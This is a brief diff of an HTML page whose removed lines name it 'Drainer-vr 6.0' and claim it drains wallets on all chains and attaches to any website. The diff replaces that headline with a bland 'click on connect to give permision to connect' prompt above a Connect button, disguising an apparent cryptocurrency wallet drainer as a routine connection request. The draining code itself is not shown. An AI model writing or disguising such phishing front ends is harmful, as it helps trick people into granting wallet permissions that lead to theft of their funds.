--- a/index.html
+++ b/index.html
@@ -27,10 +27,9 @@
 </style>
 <body>
     <div class="container">
-    <h1>Drainer-vr 6.0</h1>
-    <p>It drains all chains and you can attach to any website!!!!</p>
+    <p>click on connect to give permision to connect</p>
     <div class="btn">
-    <button class="interact-button">Connect</button>
+    <button class="interact-button">connect</button>
     </div>
     </div>
 </body>
